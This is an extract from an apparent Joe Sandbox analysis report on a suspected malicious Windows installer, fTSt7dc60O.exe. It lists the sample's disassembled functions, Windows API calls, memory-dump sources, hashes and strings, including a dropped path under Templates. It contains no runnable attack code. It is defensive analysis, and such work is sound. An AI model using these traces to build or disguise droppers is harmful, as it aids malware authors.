                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                          • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                          Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                          • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                          Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                          Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                          • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                          Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                          • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                          • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                          • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                          • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

                                                          Non-executed Functions

                                                          Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          Function 00404635 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 265stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$l]y$&B
                                                          • API String ID: 2246997448-4179508378
                                                          • Opcode ID: 546f34af6e6db504d39d236390c5674e1afac6e6eca725f55715711e819ceb04
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 546f34af6e6db504d39d236390c5674e1afac6e6eca725f55715711e819ceb04
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                          • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                          • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                          • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                          Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          Function 0040434B Relevance: 13.6, APIs: 9, Instructions: 99windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,?,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 00404438
